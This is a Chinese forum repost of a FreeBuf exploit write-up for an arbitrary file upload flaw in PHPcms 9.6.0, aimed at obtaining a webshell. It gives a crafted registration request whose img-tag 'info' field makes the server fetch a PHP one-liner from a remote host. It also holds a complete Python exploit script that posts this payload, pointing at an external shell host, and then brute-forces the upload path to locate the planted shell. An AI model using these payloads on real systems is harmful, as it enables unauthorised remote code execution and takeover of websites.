PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)
对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下:首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)http://image.3001.net/images/20170411/14918776322557.png!small在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问http://image.3001.net/images/20170411/14918782345439.png!small接着我们找到phpcms网站注册模块,随便填一下信息http://image.3001.net/images/20170411/14918777603334.png!small然后我们用burpsuite抓包http://image.3001.net/images/20170411/14918778455035.png!small然后发送到repeaterhttp://image.3001.net/images/20170411/14918779146571.png!small我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话poc如下:siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info=<img src=http://192.168.1.157/templets/1.txt?.php#.jpg>&dosubmit=1&protocol=
只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话连接菜刀,getshellhttp://image.3001.net/images/20170411/14918782668175.png!small利用方式二:利用火狐的插件,操作如下http://image.3001.net/images/20170411/1491881159284.png!smallexp如下:三少
# -*- coding:utf-8 -*-
import requests
import sys
from datetime import datetime
def getTime():
year = str(datetime.now().year)
month = "%02d" % datetime.now().month
day = "%02d" % datetime.now().day
hour = datetime.now().hour
hour = hour - 12 if hour > 12 else hour
hour = "%02d" % hour
minute = "%02d" % datetime.now().minute
second = "%02d" % datetime.now().second
microsecond = "%06d" % datetime.now().microsecond
microsecond = microsecond[:3]
nowTime = year + month + day + hour + minute + second + microsecond
return int(nowTime), year + "/" + month + day + "/"
def main():
if len(sys.argv) < 2:
print("[*]Usage : Python 1.py http://xxx.com")
sys.exit()
host = sys.argv
url = host + "/index.php?m=member&c=index&a=register&siteid=1"
data = {
"siteid": "1",
"modelid": "1",
"username": "dsakkfaffdssdudi",
"password": "123456",
"email": "dsakkfddsjdi@qq.com",
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
"info": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",
"dosubmit": "1",
"protocol": "",
}
try:
startTime, _ = getTime()
htmlContent = requests.post(url, data=data)
finishTime, dateUrl = getTime()
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
successUrl = htmlContent.text + ".php"
print("[*]Shell: %s" % successUrl)
else:
print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
successUrl = ""
for t in range(startTime, finishTime):
checkUrlHtml = requests.get(
host + "/uploadfile/" + dateUrl + str(t) + ".php")
if checkUrlHtml.status_code == 200:
successUrl = host + "/uploadfile/" + \
dateUrl + str(t) + ".php"
print("[*]Shell: %s" % successUrl)
break
if successUrl == "":
print(
"Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")
except:
print("Request Error")
if __name__ == '__main__':
main()
*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载http://www.freebuf.com/vuls/131648.html?spm=5176.7752487.2.5.ktjJKf
页:
[1]